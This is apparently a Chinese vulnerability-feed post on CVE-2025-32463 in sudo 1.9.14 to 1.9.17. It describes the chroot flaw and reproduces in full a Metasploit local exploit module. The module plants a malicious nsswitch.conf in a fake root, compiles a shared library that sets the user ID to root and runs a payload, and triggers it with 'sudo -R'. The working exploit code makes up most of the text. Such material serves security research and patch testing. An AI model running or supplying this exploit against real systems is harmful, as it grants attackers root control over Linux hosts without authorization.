Sudo Chroot 1917 Privilege Escalation

漏洞信息

漏洞名称: Sudo Chroot 1.9.17 Privilege Escalation

漏洞编号:

  • CVE: CVE-2025-32463

漏洞类型: 权限提升

漏洞等级: 高危

漏洞描述: 该漏洞影响sudo,一个在Unix和Linux系统中广泛使用的程序,允许用户以其他用户的权限运行程序,通常用于提升权限以执行管理任务。sudo是一个核心系统组件,几乎在所有基于Unix的操作系统中都有部署,因此其安全性至关重要。

漏洞的具体类型是权限提升,技术根源在于sudo在1.9.14版本中引入的一个变化,允许通过chroot选项在sudoers文件仍在评估时解析路径。这一变化使得攻击者能够欺骗sudo加载任意共享对象,从而导致权限提升。

此漏洞的安全风险极高,因为它允许攻击者在不需要认证的情况下,通过构造恶意的chroot环境,执行任意代码,从而获得root权限。这意味着攻击者可以完全控制系统,进行数据泄露、服务中断或其他恶意活动。由于漏洞的利用可以自动化,且不需要用户交互,因此其潜在影响非常广泛。

产品名称: sudo

影响版本: 1.9.14 <= version < 1.9.17p1

来源: https://github.com/rapid7/metasploit-framework/blob/cd6167ae00efdbeeb0b3a115fd00a75f67ffd465/modules%2Fexploits%2Flinux%2Flocal%2Fsudo_chroot_cve_2025_32463.rb

类型: rapid7/metasploit-framework:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'pry'
require 'pry-byebug'

class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Compile
  include Msf::Post::Linux::Packages
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Sudo Chroot 1.9.17 Privilege Escalation',
        'Description' => %q{
          Sudo before version 1.19.17p1 allows user to use `chroot` option, when
          executing command. The option is intended to run a command with
          user-selected root directory (if sudoers file allow it). Change in version
          1.9.14 allows resolving paths via `chroot` using user-specified root
          directory when sudoers is still evaluating.
          This allows the attacker to trick Sudo into loading arbitrary shared object,
          thus resulting in a privilege escalation.
        },
        'License' => MSF_LICENSE,

        'Author' => [
          'msutovsky-r7', # module dev
          'Stratascale', # poc dev
          'Rich Mirch' # security research
        ],
        'Platform' => [ 'linux' ],

        'Arch' => [ ARCH_CMD ],

        # chmod has some issues for meterpreter, forcing shell
        'SessionTypes' => [ 'shell', 'meterpreter' ],

        'Targets' => [[ 'Auto', {} ]],

        'Privileged' => true,

        'References' => [
          [ 'EDB', '52352' ],
          [ 'URL', 'https://www.helpnetsecurity.com/2025/07/01/sudo-local-privilege-escalation-vulnerabilities-fixed-cve-2025-32462-cve-2025-32463/'],
          [ 'CVE', '2025-32463']
        ],
        'DisclosureDate' => '2025-06-30',

        'DefaultTarget' => 0,

        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
        }
      )
    )

    # force exploit is used to bypass the check command results
    register_advanced_options [
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
    ]
  end

  def check
    sudo_version = installed_package_version('sudo')

    return CheckCode::Unknown('Could not identify the version of sudo.') if sudo_version.blank?

    return CheckCode::Safe if !file?('/etc/nsswitch.conf')

    return CheckCode::Appears("Running version #{sudo_version}") if Rex::Version.new(sudo_version).between?(Rex::Version.new('1.9.14'), Rex::Version.new('1.9.17'))

    CheckCode::Safe("Sudo #{sudo_version} is not vulnerable")
  end

  def exploit
    # Check if we're already root
    if !datastore['ForceExploit'] && is_root?
      fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override'
    end

    # needs to compile in real-time to adjust payload execution path
    fail_with Failure::NotFound, 'Module needs to compile payload on target machine' unless live_compile?

    payload_file = rand_text_alphanumeric(5..10)

    existing_shell = cmd_exec('echo $0 || echo ${SHELL}')

    return Failure::NotFound, 'Could not find shell' unless file?(existing_shell)

    upload_and_chmodx("#{datastore['WritableDir']}/#{payload_file}", "#!#{existing_shell}\n#{payload.encoded}")

    register_files_for_cleanup("#{datastore['WritableDir']}/#{payload_file}")

    temp_dir = "#{datastore['WritableDir']}/#{rand_text_alphanumeric(5..10)}"

    base_dir = rand_text_alphanumeric(5..10)

    lib_filename = rand_text_alphanumeric(5..10)

    mkdir(temp_dir)

    cd(temp_dir)

    mkdir(base_dir.to_s)

    mkdir("#{base_dir}/etc")

    mkdir('libnss_')

    return Failure::PayloadFailed, 'Failed to create malicious nsswitch.conf file' unless write_file("#{base_dir}/etc/nsswitch.conf", "passwd: /#{lib_filename}\n")

    return Failure::PayloadFailed, 'Failed to copy /etc/group' unless copy_file('/etc/group', "#{base_dir}/etc/group")

    exploit_code = %<
    #include <unistd.h>

    __attribute__((constructor))
    void exploit(void) {
      setreuid(0,0);
      execve("#{datastore['WritableDir']}/#{payload_file}",NULL,NULL);

    }>

    upload_and_compile("#{temp_dir}/libnss_/#{lib_filename}.so.2", exploit_code, "-shared -fPIC -Wl,-init,#{base_dir}")

    cmd_exec("sudo -R #{base_dir} #{base_dir}")

    timeout = 30
    print_status 'Launching exploit...'
    output = cmd_exec 'command', nil, timeout
    output.each_line { |line| vprint_status line.chomp }
  end
end


Github Poc
#rapid7/metasploit-framework:github issues #权限提升
Sudo Chroot 1917 Privilege Escalation
http://example.com/2025/08/03/github_2850449162/
作者
lianccc
发布于
2025年8月3日
许可协议